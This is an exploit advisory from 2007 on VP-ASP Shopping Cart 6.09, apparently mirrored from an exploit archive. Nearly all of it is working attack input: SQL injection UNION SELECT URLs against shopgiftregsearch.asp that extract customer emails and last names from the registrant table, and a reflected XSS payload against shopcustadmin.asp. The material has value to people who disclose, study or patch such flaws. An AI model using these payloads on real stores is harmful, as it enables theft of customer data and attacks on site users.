[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : VP-ASP Shopping Cart 6.09 (SQL/XSS) Multiple Remote Vulnerabilities
# Published : 2007-01-11
# Author : ajann
# Previous Title : Article System 0.1 (INCLUDE_DIR) Remote File Include Vulnerabilities
# Next Title : Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit
*******************************************************************************
# Title : VP-ASP Shopping Cart 6.09 Remote Multiple Vulnerabilities
# Author : ajann
# Contact : :(
# S.Page : http://www.vpasp.com
# $$ : $49.00 - $350.00 - $495.00
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//shopgiftregsearch.asp?LoginLastname=[SQL]
Example:
//shopgiftregsearch.asp?LoginLastname='%20union%20select%200,email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
//shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
This Informations go to login page.
[[/SQL]]
[[XSS]]]---------------------------------------------------------
http://[target]/[path]//shopcustadmin.asp?msg=[XSS]
Example:
//shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E
[[/XSS]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# www.Syue.com [2007-01-11]